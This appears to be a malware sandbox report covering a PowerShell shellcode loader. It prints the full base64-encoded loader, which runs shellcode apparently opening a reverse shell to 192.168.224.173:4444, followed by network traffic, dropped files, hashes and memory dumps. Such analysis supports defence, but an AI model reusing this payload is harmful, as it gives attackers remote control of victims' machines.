dwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABjAHIAbQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAFcAUQA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQA4ADkALAB9AGUANQAsAH0AMwAxACwAfQBkADIALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMwAxACwAfQBmAGYALAB9ADAAZgAsAH0AYgA3ACwAfQA0AGEALAB9ADIANgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0AOABiACwAfQA1ADIALAB9ADEAMAAsAH0ANQA3ACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0ANQAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQAzADEALAB9AGYAZgAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBjADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9AGEAYwAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AYwAwACwAfQBhADgALAB9AGUAMAAsAH0AYQBkACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQAxADEALAB9ADUAYwAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYQAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9AGUAOAAsAH0ANgA3ACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZQAsAH0AMwA2ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADMALAB9AGYAOAAsAH0AMAAwACwAfQA3AGQALAB9ADIAOAAsAH0ANQA4ACwAfQA2ADgALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgBhACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQAwAGIALAB9ADIAZgAsAH0AMABmACwAfQAzADAALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADcALAB9ADYAOAAsAH0ANwA1ACwAfQA2AGUALAB9ADQAZAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0ANQBlACwAfQA1AGUALAB9AGYAZgAsAH0AMABjACwAfQAyADQALAB9ADAAZgAsAH0AOAA1ACwAfQA3ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9AGUAOQAsAH0AOQBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AYwAxACwAfQBjADMALAB9AGIAYgAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQA2AGEALAB9ADAAMAAsAH0ANQAzACwAfQBmAGYALAB9AGQANQAiADsAJAB2AEcAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFAATAAgAC0ATgBhAG0AZQAgACIAcAB4ACIAIAAtAG4AYQBtAGUAcwAgAHEAeQBiADsAJAB2AEcAPQAkAHYARwAuAHIAZQBwAGwAYQBjAGUAKAAiAHEAeQBiACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdAAiACsAIgBpACIAKwAiAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFcAUQAgAD0AIAAkAFcAUQAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAUwBqAG0AeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBTAGoAbQAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAcwBGAD0AMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAVwBRAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADcAKQB7ACQAcwBGAD0AJABXAFEALgBMAH0AOwAkAFUAUAA9ACQAdgBHADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA3ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABjAHIAbQAgAD0AIAAwADsAZgBvAHIAKAAkAFMAbwA9ADAAOwAkAFMAbwAgAC0AbABlACgAJABXAFEALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAUwBvACsAKwApAHsAJAB2AEcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAFAALgBUAG8ASQBuAHQAMwAyACgAKQArACQAUwBvACkALAAgACQAVwBRAFsAJABTAG8AXQAsACAAMQApAH0AOwAkAHYARwA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABVAFAALAAgADAAeAAxADAAMAA3ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABjAHIAbQApADsAJABvAG0AbAA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJAB2AEcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwBpAG4AdABdADAALAAkAG8AbQBsACwAJABVAFAALAAwACwAMAAsADEALQAxACkAOwA=

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3caw3ii\w3caw3ii.cmdline"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES609E.tmp" "c:\Users\Admin\AppData\Local\Temp\w3caw3ii\CSCBC183396E756464496C727A83D99864.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp
N/A 192.168.224.173:4444 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp

Files

memory/2236-0-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-1-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-2-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-3-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-4-0x00007FF85FA0D000-0x00007FF85FA0E000-memory.dmp

memory/2236-5-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-6-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-12-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-11-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-13-0x00007FF81D090000-0x00007FF81D0A0000-memory.dmp

memory/2236-10-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-9-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-8-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-7-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-16-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-17-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-18-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-19-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-20-0x00007FF81D090000-0x00007FF81D0A0000-memory.dmp

memory/2236-15-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-14-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-36-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-35-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2552-37-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2552-39-0x000001A57B770000-0x000001A57B792000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ara10o5y.l1z.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2980-63-0x0000000002890000-0x00000000028C6000-memory.dmp

memory/2980-64-0x0000000005010000-0x0000000005638000-memory.dmp

memory/2980-65-0x0000000004F90000-0x0000000004FB2000-memory.dmp

memory/2980-66-0x0000000005770000-0x00000000057D6000-memory.dmp

memory/2980-68-0x00000000057E0000-0x0000000005846000-memory.dmp

memory/2980-77-0x0000000005850000-0x0000000005BA4000-memory.dmp

memory/2980-78-0x0000000005E80000-0x0000000005E9E000-memory.dmp

memory/2980-79-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

memory/2980-80-0x0000000006260000-0x00000000062A4000-memory.dmp

memory/2980-81-0x00000000077E0000-0x0000000007E5A000-memory.dmp

memory/2980-82-0x0000000006440000-0x000000000645A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\w3caw3ii\w3caw3ii.cmdline

MD5 8824831432e97f8fd81516fe67efc454
SHA1 bce55b75a256409418414649cecbaf24b34c41a0
SHA256 76f21d9d0ce5e5cf4880c4e33837dad1219fdbfbd7717eecdbc6c7ffe9271e88
SHA512 8b001cf82ff8ca7fbbf9f2cbcf16abad94109c9b7eb402385853da14272b02767f5e2271dc80e57d5473c62441370baf64fe20190447b0e81c6249e0162a4c6e

\??\c:\Users\Admin\AppData\Local\Temp\w3caw3ii\w3caw3ii.0.cs

MD5 983cad5e58b8e626d0bbb94f162c2530
SHA1 928e5a00d6770e304a4535dd46de98a2674bc6e1
SHA256 566297f4d486eba0ee60cdb68d4e0a3714c985a77a3be4ceeff5449ba11c3c1d
SHA512 1bf465fe68634c242b8493dde11a521d13aa2d95b60ccefc405dc53150d3654a1b699c6cab230d11c5e6655eaa72949040eec739b3125d7f8729bc028dffcda6

\??\c:\Users\Admin\AppData\Local\Temp\w3caw3ii\CSCBC183396E756464496C727A83D99864.TMP

MD5 b15fc986ad99a20ab72cc893caed167d
SHA1 bf51ec176f1c3ab39493973104ff70bb15b57697
SHA256 fc6eac87dfb48572b962ae34a4a83d03225c8b10538ac6100f23a06fdce055e9
SHA512 b8e4585bd3f99a5876ed870983d1c562e90d4c37a778beb8ecb0a5eb0ec88e90221dd25886d51cbaa601122446eb62f588c1f69914d00436d1e3a0495bd45fed

C:\Users\Admin\AppData\Local\Temp\RES609E.tmp

MD5 42fc88e078d1c6242bfded2950e8fc74
SHA1 9b60da3b844f73830367b98ab8ebb38202d1389d
SHA256 f38b5b853259bc0a9933a56ecc5924a5357c748f633d5f7a0d2671676444a8c7
SHA512 a0c28fe00ea5e74463aa1a44b6b15b5fb335dc208a272482c2d22ecd59aa55f99247abbb399e9c9f2e12564f90908acd23e4b0fa86641168d19ad92b74fbfeeb

C:\Users\Admin\AppData\Local\Temp\w3caw3ii\w3caw3ii.dll

MD5 409ba493ca665ab20b3397a400f8e89d
SHA1 985b2dff59164dab67631f8d0266d5bf90ee3459
SHA256 9b6ee04705129bcd2b7c3eec05c1796a2383c60d064112ed0bb6b68e4370a765
SHA512 8363819d3433eacbce1f99fb3f9427c4c31155c1e14260e0693dc649ddf110aa172eeb900fd834badac30dc43678e56680eb670bb521d0eb5205df0fe234f7bc

memory/2980-95-0x0000000007180000-0x0000000007188000-memory.dmp

memory/2236-98-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2236-116-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-115-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-114-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-113-0x00007FF81F9F0000-0x00007FF81FA00000-memory.dmp

memory/2236-117-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp

memory/2980-120-0x0000000007330000-0x00000000073A6000-memory.dmp

memory/2552-122-0x00007FF85F970000-0x00007FF85FB65000-memory.dmp